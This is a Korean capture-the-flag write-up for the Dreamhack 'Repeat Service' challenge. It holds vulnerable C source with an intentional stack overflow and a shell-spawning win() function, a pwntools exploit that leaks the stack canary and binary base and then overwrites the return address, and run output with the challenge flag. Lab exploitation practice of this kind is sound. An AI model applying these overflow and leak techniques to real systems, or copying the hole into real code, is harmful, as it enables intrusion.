Description
Repeat Service는 문자열을 입력해주면 반복해서 출력해주는 편리한 서비스입니다.
반복하고 싶은 문구가 있다면 한 번 사용해보세요!
문자열을 계속 출력하다보면 플래그를 얻을 수 있을지도…?
checksec
ubuntu@wh1te4ever-main:~/Desktop/dreamhack-CTF/Repeat_Service/deploy$ checksec ./main [*] '/home/ubuntu/Desktop/dreamhack-CTF/Repeat_Service/deploy/main' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
Source Code
// gcc -o main main.c #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <fcntl.h> void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); } void win() { system("/bin/sh"); } int main() { initialize(); char inp[80] = {0}; char buf[1000] = {0}; puts("Welcome to the Repeat Service!"); puts("Please put your string and length."); while (1) { printf("Pattern: "); int len = read(STDIN_FILENO, inp, 80); if (len == 0) break; if (inp[len - 1] == '\n') { inp[len - 1] = 0; len--; } int target_len = 0; printf("Target length: "); scanf("%d", &target_len); if (target_len > 1000) { puts("Too long :("); break; } int count = 0; while (count < target_len) { memcpy(buf + count, inp, len); count += len; } printf("%s\n", buf); } return 0; }
Analysis
Solution
from pwn import * #context.log_level = 'debug' context(arch='amd64',os='linux') warnings.filterwarnings('ignore') p = remote('host3.dreamhack.games', 9063) #p = process('./main') e = ELF('./main') #leak canary p.sendlineafter(b'Pattern: ', b'A'*7) p.sendlineafter(b'Target length: ', b'999') canary = p.recvline() canary = canary.split(b'A'*1001)[1] canary = canary.split(b'\n')[0] canary = canary[:7].rjust(8, b"\x00") canary = u64(canary) print(f"canary: {hex(canary)}") #leak bin_base p.sendlineafter(b'Pattern: ', b'A'*43) p.sendlineafter(b'Target length: ', b'1000') main = p.recvline() main = main.split(b'A'*1032)[1] main = main.split(b'\n')[0].ljust(8, b"\x00") main = u64(main) print(f"main: {hex(main)}") bin_base = main - e.symbols["main"] print(f"bin_base: {hex(bin_base)}") #Overwrite RET p.sendlineafter(b'Pattern: ', (p64(canary) + p64(canary) + p64(canary) + p64(bin_base + e.symbols["win"] + 0x5))) p.sendlineafter(b'Target length: ', b'1000') p.sendlineafter(b'Pattern: ', b'A') p.sendlineafter(b'Target length: ', b'1001') p.interactive()
Result
ubuntu@wh1te4ever-main:~/Desktop/dreamhack-CTF/Repeat_Service/deploy$ python3 solve.py [+] Opening connection to host3.dreamhack.games on port 9063: Done [*] '/home/ubuntu/Desktop/dreamhack-CTF/Repeat_Service/deploy/main' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled canary: 0xa498395229fa7900 main: 0x56151324628a bin_base: 0x561513245000 [*] Switching to interactive mode Too long :( $ ls flag main $ cat flag DH{fbe2067c4a1ee6e099397b333cfaa36dd958e493cd530ba0a53ae15d349b547e} $ [*] Interrupted [*] Closed connection to host3.dreamhack.games port 9063